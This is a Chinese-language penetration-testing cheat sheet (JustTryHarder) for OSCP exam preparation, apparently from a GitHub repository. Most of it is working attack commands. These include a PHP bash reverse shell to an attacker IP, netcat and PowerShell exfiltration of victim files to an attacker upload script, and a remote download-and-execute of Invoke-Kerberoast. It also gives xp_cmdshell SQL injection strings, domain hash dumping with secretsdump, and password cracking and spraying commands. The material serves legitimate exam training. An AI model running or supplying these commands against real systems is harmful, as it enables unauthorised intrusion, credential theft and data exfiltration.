全面的渗透测试速查表,用于PWK/OSCP考试准备,涵盖权限提升、密码破解、Payload生成、后渗透、端口扫描、Web攻击和侦察技术。
JustTryHarder 是一份速查表,将帮助您完成 PWK 课程和 OSCP 考试。
(受 PayloadAllTheThings 启发)
如果这对你有帮助,欢迎提交 Pull Request 并点个星来表达一些爱。💖
欢迎 Hacktoberfest! 是的,我们欢迎在 Hacktoberfest 期间提交 Pull Request!请确保不是垃圾信息,并且确实对该仓库有良好贡献。感谢并祝黑客快乐!
免责声明: 以下内容不包含 PWK 实验室/OSCP 考试的剧透。
我通过其他 Github 仓库、博客、网站等获取了大量信息。我已尽力尽可能地注明原始创作者。如果我没有注明你的信息,请在 Twitter 上联系我:https://twitter.com/s1nfulz
ping 10.10.10.110 PING 10.10.10.110 (10.10.10.110) 56(84) bytes of data. 64 bytes from 10.10.10.110: icmp_seq=1 ttl=128 time=166 ms
`TTL` 可用于确定主机的操作系统。如下所示,共有三种不同的 TTL 类型:
- **TTL=64** = \*nix - 跳数;因此,如果你得到 61,那么有 3 跳,并且是 \*nix 设备。很可能是 Linux。
- **TTL=128** = Windows - 同样,如果 TTL 是 127,那么跳数为 1,并且是 Windows 机器。
- **TTL=254** = Solaris/AIX - 如果 TTL 是 250,那么跳数为 4,并且是 Solaris 机器。
## BOF(正在编写中)
(典型的坏字符包括:`0x00`、`0x0A`、`0x0D`)
- 模糊测试
- 查找 EIP 位置
- 查找坏字符
- 定位 `jmp esp`
- 使用 `msfvenom` 生成载荷
- 使用 `netcat` 获取反向 Shell
**优秀的 BOF 资源:**
- [NCC Group - 为 Win32 编写漏洞利用](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/writing-exploits-for-win32-systems-from-scratch/)
- [Corelan - 漏洞利用编写教程第1部分](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
- [GitHub - dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
- [VeteranSec - 32位 Windows 缓冲区溢出简单教程](https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/)
## 逃逸/环境逃逸
- [Pentest Partners - 突破 Citrix](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk 逃逸](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - Kiosk/POS 逃逸键](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [Cognosec - 突破 Citrix 环境](https://cognosec.com/breaking-out-of-citrix-environment/)
- [NetSPI - 突破应用程序](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
- [NCC Group - 环境逃逸的常见问题 (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - Citrix 逃逸](https://gracefulsecurity.com/citrix-breakout/)
## DNS - 区域传输```bash
host -t axfr HTB.local 10.10.10.10
host -l HTB.local 10.10.10.10
host -l <domain name> <name server>
dig @<dns server> <domain> axfr
```
## 文件传输
### SMB 传输
在受害者机器(Windows)上:```cmd
net share \\10.10.10.10\myshare
net use x:
copy whatever.zip x:
```
### Wget 传输
如何从主机检索文件(在反向Shell内)。
**设置:** 将你要传输的文件放在 `/var/www/html/` 中,并运行 `service apache2 start`。
在远程服务器上运行:```bash
wget [http://10.10.10.10/pspy64](http://10.10.10.10/pspy64) # <- for single file
wget -r [http://10.10.10.10/pspy64/](http://10.10.10.10/pspy64/) # <- for folder
```
### TFTP 传输
(如何从 Kali 传输到 Windows)。
**使用 MSF:**
在这些步骤之前启动 MSF:
1. `use auxiliary/server/tftp`
2. `set TFTPROOT /usr/share/mimikatz/Win32/`
3. `run`
**在终端内:**
4\. `tftp -i 10.10.10.10 GET mimikatz.exe`
### NetCat(Windows 到 Kali)
1. **Windows:** `nc -nv 10.11.0.61 4444 < bank-account.zip`
2. **Linux:** `nc -nlvp 4444 > bank-account.zip`
### PowerShell
交互式会话:```powershell
Invoke-WebRequest -Uri [http://127.0.0.1/exploit.py](http://127.0.0.1/exploit.py) -OutFile C:\Users\Victim\exploit.py
```
在没有交互式PowerShell会话的情况下(创建`wget.ps1`):```powershell
$client = New-Object System.Net.WebClient
$path = "C:\path\to\save\file.txt"
$client.DownloadFile($url, $path)
```
### Base64 (Linux -\> Linux)
**本地主机:**
1. `$(echo "cat /path/to/exploit.py | base64") > encoded.b64`
2. 通过 `nc` 或其他方式将 `encoded.b64` 传输到远程服务器。
**远程服务器 - Linux:**
3. `cat /path/to/encoded.b64 | base64 -d > exploit.py`
### Certutil```cmd
certutil.exe -urlcache -split -f "[http://ip.for.kali.box/file-to-get.zip](http://ip.for.kali.box/file-to-get.zip)" name-to-save-as.zip
```
### HTTP 文件上传(外泄)
**1. 创建 upload.php**
在攻击机 webroot(默认为 `/var/www/html`)中创建。```php
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
```
**2. 创建目录**
创建上传目录并设置适当的权限以允许上传。```bash
sudo mkdir /var/www/uploads && sudo chown www-data:www-data /var/www/uploads
```
**3. 上传文件** 使用PowerShell从受害者机器上传文件到攻击机器:```powershell
powershell.exe -exec unrestricted -noprofile -Command "(New-Object System.Net.WebClient).UploadFile('[http://10.10.10.10/upload.php](http://10.10.10.10/upload.php)', 'file-to-upload.txt')"
```
## Kerberoasting
- `GetUserSPNs.py -request -dc-ip <DC_IP> <domain\user>`
- `powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat`
- `impacket-secretsdump -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER> -outputfile filename.hashes`
## LFI / RFI
**PHP 反向 Shell:**```php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10/1234 0>&1'"); ?>
```
**命令注入:**```php
<?php echo shell_exec(whoami);?>
```
## MSSQL / SQL注入
- `EXEC master..xp_cmdshell 'whoami';`
- `' exec master..xp_cmdshell 'whoami' --`
- [OSCP-2 SQL注入速查表](https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md)
- [PentestMonkey SQL注入](http://pentestmonkey.net/category/cheat-sheet/sql-injection)
## 密码破解
**Hashcat**```bash
hashcat -m 500 -a 0 -o cracked_password.txt --force hash.txt /path/to/your/wordlist.txt
```
**John The Ripper**```bash
john --rules --wordlist=/path/to/your/wordlist.txt hash.txt
```
## 密码喷射 (CrackMapExec)```bash
cme smb 10.10.10.10 -u username -d domain -p password
```
## 有效载荷生成
- [NETSEC - 创建有效载荷](https://netsec.ws/?p=331)
- [MsfVenom 速查表](https://www.google.com/search?q=http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/_)
- [Metasploit Unleashed 有效载荷](https://www.offensive-security.com/metasploit-unleashed/payloads/)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
**类型:**
- 非分段:`netcat`
- 分段:`multi/handler`
## PHP
- [exec()、shell_exec、system() 和 passthru() 之间的区别](https://stackoverflow.com/questions/20072696/what-is-different-between-exec-shell-exec-system-and-passthru-functions?lq=1)
## 权限提升 - Linux
**注意:** 如果安装了 GCC 和 wget,系统可能容易受到内核漏洞利用的攻击。
- [Linux 内核漏洞利用](https://github.com/SecWiki/linux-kernel-exploits)
- [GTFObins - 突破受限 shell](https://gtfobins.github.io)
- GTFO 辅助脚本: [https://github.com/dreadnaughtsec/gtfo](https://github.com/dreadnaughtsec/gtfo)
- [Linux 漏洞利用建议器](https://github.com/InteliSecureLabs/Linux_Exploit_Suggester)
- [Linux 漏洞利用建议器 2](https://github.com/jondonas/linux-exploit-suggester-2)
- [基本 Linux 权限提升](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
```